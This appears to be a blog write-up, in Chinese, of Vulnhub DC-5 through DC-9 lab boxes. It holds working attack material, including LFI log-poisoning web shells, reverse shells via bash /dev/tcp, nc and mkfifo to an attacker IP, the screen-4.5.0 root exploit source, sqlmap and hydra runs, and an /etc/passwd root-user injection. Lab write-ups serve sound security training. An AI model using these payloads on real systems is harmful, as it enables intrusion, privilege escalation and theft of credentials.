Vulnhub - DC系列
往期回顾
Vulnhub-DC这套靶机放那好久一直没打,这次就一块整理完😆
DC-5
nmap扫描存活主机和端口,发现开放了80、111、46407端口
其中,111和46407端口存在rpcbind ddos漏洞
该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放
use auxiliary/scanner/misc/sunrpc_portmapper
set RHOSTS 192.168.150.150
访问80端口如下:
其中Contact模块可以提交数据,随便填一下提交发现被重定向到thankyou.php页面,并且底部的年份也发生了变化,接着尝试包含具有这些参数的文件,可能存在LFI漏洞
利用wfuzz来进行测试,发现file参数可以成功文件包含得到/etc/passwd
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.150.150/thankyou.php?FUZZ
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt -u http://192.168.150.150/thankyou.php?file=FUZZ
接着根据前面得知它用的Nginx服务,而Nginx的默认配置文件位置都保存在/etc/nginx/目录下,所以我们来看一下/etc/nginx/nginx.conf文件
##
# Logging Settings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
找到系统日志文件后我们可以发送请求,再利用文件包含系统日志文件去执行命令反弹shell
?file=<?php system($_GET['cmd']); ?>
?file=/var/log/nginx/error.log&cmd=bash -i >& /dev/tcp/192.168.150.128/1234 0>&1
# 或者使用nc来反弹
?file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.150.128 1234
# 也可以写入一句话(不过我这测试没成功
?file=<?php @eval($_POST["harvey"]); ?>
然后查看是否有可利用的SUID,查找4000权限发现有个具有SUID权限的异常二进制文件screen-4.5.0
find / -perm -4000 2>/dev/null
搜索可以发现screen-4.5.0存在本地提权
开启web服务,上传sh文件发现只有在/tmp目录下才有权限,并且执行sh文件时发现它会报错
于是查看一下这个sh文件得知它可分为三个部分
需要手工编译一下这两个C文件,并修改一下sh文件将前面的内容删除只留下最后一部分
# libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
gcc -fPIC -shared -ldl -o libhax.so libhax.c
# rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
gcc -o rootshell rootshell.c
# 41154.sh
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
再开启web服务上传这三个文件并执行一下sh文件即可提权(不过我这执行出了个问题😶🌫️
/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)
再来尝试手工打了一下也是不行
应该就是编译的时候glibc版本太高导致的
www-data@dc-5:/tmp$ objdump -p /tmp/rootshell
objdump -p /tmp/rootshell
/tmp/rootshell: file format elf64-x86-64
Program Header:
PHDR off 0x0000000000000040 vaddr 0x0000000000000040 paddr 0x0000000000000040 align 2**3
filesz 0x00000000000002d8 memsz 0x00000000000002d8 flags r--
INTERP off 0x0000000000000318 vaddr 0x0000000000000318 paddr 0x0000000000000318 align 2**0
filesz 0x000000000000001c memsz 0x000000000000001c flags r--
LOAD off 0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**12
filesz 0x0000000000000700 memsz 0x0000000000000700 flags r--
LOAD off 0x0000000000001000 vaddr 0x0000000000001000 paddr 0x0000000000001000 align 2**12
filesz 0x00000000000001e5 memsz 0x00000000000001e5 flags r-x
LOAD off 0x0000000000002000 vaddr 0x0000000000002000 paddr 0x0000000000002000 align 2**12
filesz 0x00000000000000e4 memsz 0x00000000000000e4 flags r--
LOAD off 0x0000000000002de8 vaddr 0x0000000000003de8 paddr 0x0000000000003de8 align 2**12
filesz 0x0000000000000268 memsz 0x0000000000000270 flags rw-
DYNAMIC off 0x0000000000002df8 vaddr 0x0000000000003df8 paddr 0x0000000000003df8 align 2**3
filesz 0x00000000000001e0 memsz 0x00000000000001e0 flags rw-
NOTE off 0x0000000000000338 vaddr 0x0000000000000338 paddr 0x0000000000000338 align 2**3
filesz 0x0000000000000020 memsz 0x0000000000000020 flags r--
NOTE off 0x0000000000000358 vaddr 0x0000000000000358 paddr 0x0000000000000358 align 2**2
filesz 0x0000000000000044 memsz 0x0000000000000044 flags r--
0x6474e553 off 0x0000000000000338 vaddr 0x0000000000000338 paddr 0x0000000000000338 align 2**3
filesz 0x0000000000000020 memsz 0x0000000000000020 flags r--
EH_FRAME off 0x000000000000200c vaddr 0x000000000000200c paddr 0x000000000000200c align 2**2
filesz 0x000000000000002c memsz 0x000000000000002c flags r--
STACK off 0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**4
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-
RELRO off 0x0000000000002de8 vaddr 0x0000000000003de8 paddr 0x0000000000003de8 align 2**0
filesz 0x0000000000000218 memsz 0x0000000000000218 flags r--
Dynamic Section:
NEEDED libc.so.6
INIT 0x0000000000001000
FINI 0x00000000000011dc
INIT_ARRAY 0x0000000000003de8
INIT_ARRAYSZ 0x0000000000000008
FINI_ARRAY 0x0000000000003df0
FINI_ARRAYSZ 0x0000000000000008
GNU_HASH 0x00000000000003a0
STRTAB 0x00000000000004d0
SYMTAB 0x00000000000003c8
STRSZ 0x00000000000000ad
SYMENT 0x0000000000000018
DEBUG 0x0000000000000000
PLTGOT 0x0000000000004000
PLTRELSZ 0x0000000000000078
PLTREL 0x0000000000000007
JMPREL 0x0000000000000688
RELA 0x00000000000005c8
RELASZ 0x00000000000000c0
RELAENT 0x0000000000000018
FLAGS_1 0x0000000008000000
VERNEED 0x0000000000000598
VERNEEDNUM 0x0000000000000001
VERSYM 0x000000000000057e
RELACOUNT 0x0000000000000003
Version References:
required from libc.so.6:
0x09691a75 0x00 03 GLIBC_2.2.5
0x069691b4 0x00 02 GLIBC_2.34
www-data@dc-5:/tmp$ nm /tmp/rootshell | grep GLIBC_2.34
nm /tmp/rootshell | grep GLIBC_2.34
U __libc_start_main@GLIBC_2.34于是换台老一点的再编译上传即可成功提权得到flag
DC-6
nmap扫描存活主机和端口,发现开放了22、80端口
访问80端口如下:
于是我们需要修改/etc/hosts文件
192.168.150.152 wordy
再次访问即可看到一个wp的站点,其版本为5.1.1,信息如下:
再用dirb扫一下目录啥的,并没有发现什么可以直接利用的
接着拿出wpscan跑一下看看,枚举出五个用户admin、mark、graham、sarah、jens
wpscan --url http://wordy/ --enumerate u
然后根据所给提示生成字典进行爆破得到用户mark的密码:helpdesk01
CLUE OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job. cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy/ -U dc-6-users.txt -P passwords.txt -t 50
成功登录后台后发现有个Activity monitor可能存在漏洞
搜索发现有个Activity Monitor Command Injection的漏洞,可以直接利用该html文件,修改一下IP和端口即可反弹shell
这里我就手工打一下,点击Activity monitor –> Tools –> IP or integer,在IP or integer *处注入一个Linux命令,可以使用|;&成功执行命令
于是尝试反弹shell,这里有个长度限制需要f12修改一下长度,成功反弹shell后我们生成一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
接着在/home/mark/stuff目录下发现things-to-do.txt文本如下:
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
从而我们可以得到的密码:GSo7isUM1D4,尝试ssh成功登录
接着我们发现用户graham可以在没有密码的情况下以jens身份运行backup.sh
然后来到/home/jens目录下,将/bin/bash添加到脚本并执行它来切换至jens用户
echo /bin/bash > backups.sh
sudo -u jens ./backups.sh
再来执行一下sudo -l发现可以在没有密码的情况下运行nmap,于是我们就可以通过nmap提权得到flag
echo 'os.execute("/bin/sh")' > shell
sudo nmap --script=shell
DC-7
nmap扫描存活主机和端口,发现开放了22、80端口
访问80端口是个Drupal的站点,信息如下:
底部有个@DC7USER的用户,根据ID社工搜索一下可以找到有个GitHub和Twitter
其中在他的Twitter上我们没有发现任何有用信息,而在他的GitHub上存在一个库staffdb
接着在配置文件config.php中得到账密dc7user/MdR3xOgB7#dW,于是尝试web登录失败,ssh登录成功
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
登录后查看mbox文件发现有个/opt/scripts/backups.sh的脚本在运行
From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EPu-0000CV-5C
for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3EeF-0000Dx-G1
for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Esl-0000Ec-JQ
for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3F7H-0000G3-Nb
for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Hvd-0000ED-CP
for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists
From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3Jng-0000Iw-Rq
for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3K28-0000Ll-11
for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3LCo-0000Eb-02
for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3O0y-0000Ed-To
for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
于是我们查看/opt/scripts/backups.sh文件发现这个脚本正在以root的身份运行并且和www-data在同一个组中,再来查看内容可以看到有个drush命令,它可以用于更改帐户密码
drush是drupal shell,用来管理drupal的命令列工具,用于与drupal cms进行通信
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
接着切换到/var/www/html目录下,在有Drupal的环境中尝试使用该命令来更改管理员密码
drush user-password admin --password=admin
再来登录页面可以看到我们此时可以成功登录了
接着点击Manage -> Extend -> Install new module发现可以上传模块,于是我们下载Drupal的PHP包并上传tar文件,点击Enable newly added modules启用它,再勾选PHP Filter后点击Install完成模块的安装
https://www.drupal.org/project/php
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
然后点击Content -> Add content -> Basic page,在Text format处选择PHP code并放入反弹shell的代码,点击Preview成功反弹shell后生成一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
后面看到可以利用weevely生成木马并通过weevely连接木马weevely generate 密码 生成的路径及文件名 weevely generate harvey /root/harvey.php weevely http://192.168.150.153/node/4 harvey
接着我们就可以来到/opt/scripts目录下添加反弹shell的命令到backups.sh文件中并执行它实现提权
# 提权失败?
echo "bash -i >& /dev/tcp/192.168.150.128/4444 0>&1" > backups.sh
# 后面查看wp说是要这样写,但是我试了下还是提权失败😅
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.150.128 4444 >/tmp/f" >> backups.sh
# 还有个利用msfvenom来生成反向shell,但是依旧提权失败😣
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.150.128 lport=4444 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 93 bytes
mkfifo /tmp/fmsr; nc 192.168.150.128 4444 0</tmp/fmsr | /bin/sh >/tmp/fmsr 2>&1; rm /tmp/fmsr
echo "mkfifo /tmp/fmsr; nc 192.168.150.128 4444 0</tmp/fmsr | /bin/sh >/tmp/fmsr 2>&1; rm /tmp/fmsr" >> backups.sh后面重启了一下靶机再试试反弹shell就可以了,amazing🤣
DC-8
nmap扫描存活主机和端口,发现开放了22、80端口
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35a7e6c4a83c631de1c0caa366bc88bf (RSA)
| 256 abef9f69acea54c68c6155490ae7aad9 (ECDSA)
|_ 256 7ab2c687ec9376d4ea594b1bc6e873f2 (ED25519)
80/tcp open http Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to DC-8 | DC-8
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache
访问80端口是个Drupal的站点,信息如下:
接着我们注意到/CHANGELOG.txt文件,访问可知Drupal的版本为7.67
于是搜索一下对应版本存在的漏洞,然而这些都没啥用😒
再回头来看一下页面的功能块,发现有个可疑参数?nid=1,尝试加个'发现有报错如下:
于是我们利用sqlmap跑一下,发现有个可疑的数据库d7db
sqlmap -u http://192.168.150.154/?nid=1 --batch --dbs
接着查表发现如下:
sqlmap -u http://192.168.150.154/?nid=1 --batch -D d7db --tables
接着再来dump一下users表发现存在admin和john两个用户
┌──(root💀hacker)-[~]
└─# sqlmap -u http://192.168.150.154/?nid=1 --batch -D d7db -T users --dump
┌──(root💀hacker)-[~]
└─# sqlmap -u http://192.168.150.154/?nid=1 --batch -D d7db -T users -C name,pass --dump
Database: d7db
Table: users
[2 entries]
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-------+---------------------------------------------------------+
于是尝试爆破hash,得到用户john的密码:turtle
从而成功登录Drupal
点击Content -> Add content -> Basic page发现这里只能编辑纯文本,无法添加php代码
于是接着翻一翻,在Contact Us -> Form settings中发现可以插入php代码,输入php-reverse-shell并保存
然后填写好信息后点击Submit即可反弹shell,并生成一个交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
接着查看是否有可利用的SUID,发现有个具有SUID权限的异常二进制文件/usr/sbin/exim4
find / -perm -4000 2>/dev/null
于是查看exim的版本为4.89并搜索相关漏洞发现有个Exim 4.87 - 4.91 - Local Privilege Escalation
然后开个web服务并上传sh文件,这里需要切换至/tmp目录才有权限
cd /tmp
chmod 777 46996.sh
bash ./46996.sh -m netcat
nc -e /bin/sh 192.168.150.128 4444
运行sh文件,nc反弹shell即可成功提权得到flag
DC-9
nmap扫描存活主机和端口,发现开放了80端口
访问80端口如下:
查看功能块发现Search模块输入任何数据它都会返回到results.php
于是burp抓包将其保存到文本中
然后使用此请求丢到sqlmap里跑一下获取数据库
┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch --dbs
available databases [3]: [*] information_schema [*] Staff [*] users
接着查表发现有个UserDetails的表
┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D users --tables
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
接着再来dump一下发现存在如下用户:
┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D users -T UserDetails --dump
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
再来看看Staff这个数据库的,cmd5解密得到admin密码:transorbital1
┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D Staff --tables
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
┌──(root💀hacker)-[~]
└─# sqlmap -r DC-9-request.txt --batch -D Staff -T Users --dump
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+
成功登录后台并且发现底部提示File does not exist
于是我们尝试文件包含发现可以成功读取到/etc/passwd
?file=../../../../etc/passwd
接着根据前面nmap扫的结果ssh 22端口被过滤了,可能有某种机制可以触发从而允许进入,于是我们检查端口敲击序列,找到了/etc/knockd.conf文件如下:
22/tcp filtered ssh
[options] UseSyslog
[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
然后我们需要按照端口顺序7469,8475,9842使用knock命令进行端口碰撞,再使用nmap扫描查看是否打开了ssh
knock 192.168.150.155 7469 8475 9842
nmap -p22 192.168.150.155
再根据前面UserDetails表中得到的账密通过hydra进行爆破可知有三个用户可以登录ssh
┌──(root💀hacker)-[~]
└─# hydra -L users.txt -P pass.txt 192.168.150.155 ssh
[DATA] attacking ssh://192.168.150.155:22/
[22][ssh] host: 192.168.150.155 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.150.155 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.150.155 login: janitor password: Ilovepeepee
接着在janitor用户中发现passwords-found-on-post-it-notes.txt文本如下:
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
于是再通过hydra进行爆破又得到一组账密fredf/B4-Tru3-001,该用户很可能对后面提权有帮助
ssh登录fredf用户,执行一下sudo -l发现可以在没有密码的情况下以root身份运行test
但是这里跑了下test发现不能直接执行,需要用到test.py
Usage: python test.py read append
于是使用find命令查找一下test.py发现就在/opt/devstuff目录下存在test.py,看下代码得知它是在读取一个文件,并将1中的内容加到2上
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test.py" -type f 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
接着我们尝试利用test将一个具有root权限的用户写入到/etc/passwd实现提权。
首先利用openssl来生成一个加盐的账号密码
┌──(root💀hacker)-[~]
└─# openssl passwd -1 -salt salt password
$1$salt$qJH7.N4xYta3aEG/dfqo/0然后切换到/tmp目录下,将具有root权限的用户信息写入到/tmp/root文件中,再将/tmp/root写入/etc/passwd,此时切换用户即可成功提权得到flag
echo 'harvey:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0::/root:/bin/bash' >> root
sudo /opt/devstuff/dist/test/test /tmp/root /etc/passwd
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-01-25,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
